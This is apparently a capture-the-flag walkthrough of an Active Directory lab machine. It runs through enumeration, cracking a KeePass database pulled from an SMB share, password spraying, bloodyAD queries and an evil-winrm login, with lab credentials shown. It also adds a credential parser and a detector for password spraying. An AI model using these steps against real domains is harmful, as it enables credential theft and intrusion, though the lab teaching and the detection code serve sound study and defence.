Puppy

The document details a penetration testing process against a Windows Server 2022 with the IP address 10.10.11.70, utilizing tools like Nmap, CrackMapExec, and BloodHound for enumeration and exploitation. It includes steps for scanning the server, gathering user credentials, and performing password spraying to gain access to the system. The process culminates in extracting sensitive data from a KeePass database and leveraging it for further access and privilege escalation within the Active Directory environment.

Uploaded by yummy.sempai
© All Rights Reserved

nmap -A 10.10.11.70 --min-rate 10000

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-19 15:22 EDT
Nmap scan report for 10.10.11.70
Host is up (0.036s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-20 02:22:53Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100003  2,3        2049/udp    nfs
|   100005  1,2,3      2049/udp    mountd
|   100021  1,2,3,4    2049/tcp    nlockmgr
|   100021  1,2,3,4    2049/udp    nlockmgr
|   100024  1          2049/tcp    status
|_  100024  1          2049/udp    status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2019|2022 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (87%), Windows Server 2019 (85%), Microsoft Windows Server 2022 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
|   date: 2025-05-20T02:24:54
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   38.28 ms 10.10.14.1
2   38.26 ms 10.10.11.70

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.87 seconds

sudo crackmapexec smb 10.10.11.70 -u levi.james -p 'KingofAkron2025!' --users

SMB  10.10.11.70  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB  10.10.11.70  445  DC  [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB  10.10.11.70  445  DC  [+] Enumerated domain user(s)
SMB  10.10.11.70  445  DC  PUPPY.HTB\steph.cooper_adm  badpwdcount: 4  desc:
SMB  10.10.11.70  445  DC  PUPPY.HTB\steph.cooper      badpwdcount: 0  desc:
SMB  10.10.11.70  445  DC  PUPPY.HTB\jamie.williams    badpwdcount: 5  desc:
SMB  10.10.11.70  445  DC  PUPPY.HTB\adam.silver       badpwdcount: 0  desc:
SMB  10.10.11.70  445  DC  PUPPY.HTB\ant.edwards       badpwdcount: 0  desc:
SMB  10.10.11.70  445  DC  PUPPY.HTB\levi.james        badpwdcount: 0  desc:
SMB  10.10.11.70  445  DC  PUPPY.HTB\krbtgt            badpwdcount: 0  desc: Key Distribution Center Service Account
SMB  10.10.11.70  445  DC  PUPPY.HTB\Guest             badpwdcount: 0  desc: Built-in account for guest access to the computer/domain
SMB  10.10.11.70  445  DC  PUPPY.HTB\Administrator     badpwdcount: 0  desc: Built-in account for administering the computer/domain

echo "10.10.11.70 DC.PUPPY.HTB PUPPY.HTB" | sudo tee -a /etc/hosts

Collect usernames:

nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt

cat users.txt

Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

Add the DC as a DNS server (check /etc/resolv.conf):
cat /etc/resolv.conf
domain www.tendawifi.com
search www.tendawifi.com
nameserver 10.0.2.3
nameserver 10.10.11.70

bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication.
Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 18S

BloodHound shows that our user has GenericWrite permission over the Developers group, but we can't continue with that, so we dig deeper.
Listing the available file shares with crackmapexec reveals the DEV share, which we open with smbclient:

smbclient \\\\10.10.11.70\\DEV -U "levi.james"

Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sun Mar 23 03:07:57 2025
  ..                                  D        0  Sat Mar  8 11:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 03:09:12 2025
  Projects                            D        0  Sat Mar  8 11:53:36 2025
  recovery.kdbx                       A     2677  Tue Mar 11 22:25:46 2025

smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (22.0 KiloBytes/sec) (average 2.1 KiloBytes/sec)

sudo apt install keepassxc

wget https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh

chmod +x keepass4brute.sh

./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 39 - Estimated time remaining: 36 weeks, 3 days
[+] Current attempt: liverpool

[*] Password found: liverpool

We found the password: liverpool.

We extract the entries and passwords stored in recovery.kdbx in XML format to the keepass_dump.xml file:

keepassxc-cli export --format=xml recovery.kdbx > keepass_dump.xml

Extracting usernames and passwords from the XML export with the keepass_extract.py script:

cat keepass_extract.py

import xml.etree.ElementTree as ET

# Parse the XML export produced by `keepassxc-cli export --format=xml`
tree = ET.parse('keepass_dump.xml')
root = tree.getroot()

# Iterate through each 'Entry'. iter() descends into every level, including
# each entry's <History> element, so previous versions of an entry are
# printed as well (which is why passwords can show up more than once).
for entry in root.iter('Entry'):
    username = None
    password = None

    # Every field of an entry is a <String> holding a <Key> and a <Value>
    for string in entry.findall('String'):
        key_el = string.find('Key')
        value_el = string.find('Value')
        if key_el is None or value_el is None:
            continue
        key = key_el.text
        value = value_el.text  # None for an empty <Value/>

        if key == 'UserName':
            username = value
        elif key == 'Password':
            password = value

    if username or password:
        print(f"User: {username}, Password: {password}")

We extract the passwords and save them to the passwords_only.txt file.

python3 script.py | awk -F'Password: ' '{print $2}' > passwords_only.txt

cat passwords_only.txt

JamieLove2025!
HJKL2025!
HJKL2025!
Antman2025!
Antman2025!
Steve2025!
Steve2025!
ILY2025!
ILY2025!
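Each password appears twice in passwords_only.txt because `root.iter('Entry')` also walks the `<History>` element of every entry, where KeePass keeps the previous versions of a record. The following parser, added here as an example and not part of the original write-up, walks the export group by group, keeps the group path and title with each credential, marks historical records explicitly, and returns a deduplicated password list. The embedded XML is a constructed, trimmed-down document in the layout of a `keepassxc-cli export --format=xml` dump, not the contents of the page's recovery.kdbx; the entry titles, user names and passwords in it are made up.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the layout of a KeePass 2 XML export:
# Root > Group > Entry > String(Key, Value), with older versions of an entry
# stored under its <History> element. Not the page's recovery.kdbx.
SAMPLE_XML = """<KeePassFile>
  <Root>
    <Group>
      <Name>Root</Name>
      <Entry>
        <String><Key>Title</Key><Value>Sample A</Value></String>
        <String><Key>UserName</Key><Value>alice</Value></String>
        <String><Key>Password</Key><Value ProtectInMemory="True">Current2025!</Value></String>
        <History>
          <Entry>
            <String><Key>Title</Key><Value>Sample A</Value></String>
            <String><Key>UserName</Key><Value>alice</Value></String>
            <String><Key>Password</Key><Value>Old2024!</Value></String>
          </Entry>
        </History>
      </Entry>
      <Group>
        <Name>Servers</Name>
        <Entry>
          <String><Key>Title</Key><Value>No password set</Value></String>
          <String><Key>UserName</Key><Value>bob</Value></String>
          <String><Key>Password</Key><Value/></String>
        </Entry>
      </Group>
    </Group>
  </Root>
</KeePassFile>
"""


@dataclass
class Credential:
    group: str                # slash-separated group path, e.g. "Root/Servers"
    title: Optional[str]
    username: Optional[str]
    password: Optional[str]
    historical: bool          # True when the record came from an entry's <History>


def _fields(entry: ET.Element) -> dict:
    """Map every <String><Key>k</Key><Value>v</Value></String> of an entry to {k: v}."""
    fields = {}
    for s in entry.findall("String"):
        key = s.find("Key")
        value = s.find("Value")
        if key is None or key.text is None:
            continue
        fields[key.text] = value.text if value is not None else None  # empty <Value/> -> None
    return fields


def _collect(entry, group, historical, include_history, out):
    f = _fields(entry)
    out.append(Credential(group, f.get("Title"), f.get("UserName"), f.get("Password"), historical))
    history = entry.find("History")
    if include_history and history is not None:
        for old in history.findall("Entry"):
            _collect(old, group, True, False, out)  # history entries carry no nested history


def _walk(group, path, include_history, out):
    name = group.findtext("Name") or ""
    path = path + [name] if name else path
    for entry in group.findall("Entry"):
        _collect(entry, "/".join(path), False, include_history, out)
    for sub in group.findall("Group"):
        _walk(sub, path, include_history, out)


def parse_keepass_xml(xml_text: str, include_history: bool = False) -> List[Credential]:
    """Return the credentials of an export; historical versions only when asked for."""
    root = ET.fromstring(xml_text)
    out: List[Credential] = []
    for group in root.findall("./Root/Group"):
        _walk(group, [], include_history, out)
    return out


def unique_passwords(creds: List[Credential]) -> List[str]:
    """Distinct non-empty passwords in first-seen order (no repeats, unlike passwords_only.txt)."""
    seen: List[str] = []
    for c in creds:
        if c.password and c.password not in seen:
            seen.append(c.password)
    return seen


if __name__ == "__main__":
    everything = parse_keepass_xml(SAMPLE_XML, include_history=True)
    for c in everything:
        flag = " (history)" if c.historical else ""
        print(f"{c.group}: {c.title} / {c.username} / {c.password}{flag}")
    print("unique passwords:", unique_passwords(everything))
```

Run it against a real export by replacing `SAMPLE_XML` with the file contents (`open('keepass_dump.xml').read()`); with the default `include_history=False` the historical versions are skipped, which is usually what you want when checking which current secrets were exposed by a leaked database.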

We do password spraying with crackmapexec

crackmapexec smb 10.10.11.70 -u users.txt -p passwords_only.txt --continue-on-success

SMB  10.10.11.70  445  DC  [+] PUPPY.HTB\ant.edwards:Antman2025!
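The user enumeration earlier showed each account's badpwdcount, and a spray of this kind keeps every account's count low by trying a handful of passwords across all users, so a per-account lockout threshold on its own does not catch it. The signature is in the source rather than the account: one origin failing logons for many distinct accounts, a few times each, in a short window, as opposed to a brute force that hammers a single account. The detector below is an added example, not part of the original write-up. It runs over constructed log lines in an assumed flat CSV layout (timestamp, event ID, target account, source IP, status); that layout, the 10.10.14.x source addresses and the timestamps are made up for the example and are not an actual Windows event export format.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: failed-logon (4625) and successful-logon (4624) records in an
# assumed "timestamp,event_id,target_user,source_ip,status" layout. It contains one
# spray (10.10.14.5: 6 accounts x 2 passwords), one brute force (10.10.14.9: 8 tries
# on a single account) and one benign user who mistyped twice and then logged in.
SAMPLE_LOG = """\
2025-05-20T02:30:00Z,4625,levi.james,10.10.14.5,0xC000006A
2025-05-20T02:30:01Z,4625,ant.edwards,10.10.14.5,0xC000006A
2025-05-20T02:30:02Z,4625,adam.silver,10.10.14.5,0xC000006A
2025-05-20T02:30:03Z,4625,jamie.williams,10.10.14.5,0xC000006A
2025-05-20T02:30:04Z,4625,steph.cooper,10.10.14.5,0xC000006A
2025-05-20T02:30:05Z,4625,steph.cooper_adm,10.10.14.5,0xC000006A
2025-05-20T02:30:30Z,4625,levi.james,10.10.14.5,0xC000006A
2025-05-20T02:30:31Z,4625,ant.edwards,10.10.14.5,0xC000006A
2025-05-20T02:30:32Z,4625,adam.silver,10.10.14.5,0xC000006A
2025-05-20T02:30:33Z,4625,jamie.williams,10.10.14.5,0xC000006A
2025-05-20T02:30:34Z,4625,steph.cooper,10.10.14.5,0xC000006A
2025-05-20T02:30:35Z,4625,steph.cooper_adm,10.10.14.5,0xC000006A
2025-05-20T02:40:00Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:40:01Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:40:02Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:40:03Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:40:04Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:40:05Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:40:06Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:40:07Z,4625,administrator,10.10.14.9,0xC000006A
2025-05-20T02:50:00Z,4625,steph.cooper,10.10.14.20,0xC000006A
2025-05-20T02:50:20Z,4625,steph.cooper,10.10.14.20,0xC000006A
2025-05-20T02:50:40Z,4624,steph.cooper,10.10.14.20,0x0
"""


def parse_events(text, event_id="4625"):
    """Parse the constructed CSV lines, keeping only the failed-logon records."""
    events = []
    for line in text.strip().splitlines():
        ts, eid, user, src, status = line.split(",")
        if eid != event_id:
            continue
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user.lower(), src, status))
    return events


def detect_spray(events, window_minutes=10, min_accounts=5, max_per_account=3):
    """Flag sources that fail logons for many distinct accounts, few times each, in one window."""
    by_src = defaultdict(list)
    for ts, user, src, _status in events:
        by_src[src].append((ts, user))
    window = timedelta(minutes=window_minutes)
    findings = []
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, _user) in enumerate(evs):
            # all failures from this source inside [start, start + window]
            in_window = Counter(u for ts, u in evs[i:] if ts - start <= window)
            if len(in_window) >= min_accounts and max(in_window.values()) <= max_per_account:
                findings.append({"source": src, "window_start": start,
                                 "accounts": sorted(in_window)})
                break  # one alert per source is enough
    return findings


def detect_bruteforce(events, threshold=5):
    """Flag (source, account) pairs with many failures against one account."""
    counts = Counter((src, user) for _ts, user, src, _status in events)
    return {pair: n for pair, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    failures = parse_events(SAMPLE_LOG)
    for f in detect_spray(failures):
        print(f"spray from {f['source']} starting {f['window_start']}: {len(f['accounts'])} accounts")
    for (src, user), n in detect_bruteforce(failures).items():
        print(f"brute force from {src} against {user}: {n} failures")
```

Tune `min_accounts` to the size of the directory (five distinct accounts is already suspicious in a ten-user domain like this one) and keep `max_per_account` below the lockout threshold, since that is exactly the range a spray operates in; the benign user at 10.10.14.20 trips neither rule.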

bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication.
Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 17S

bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail

bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -A 20 "distinguishedName: CN=.*DC=PUPPY,DC=HTB" | grep -B 20 "WRITE"

bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -E "distinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10

evil-winrm -i xx.xx.xx.xx -u 'ADAM.SILVER' -p 'Password@987'
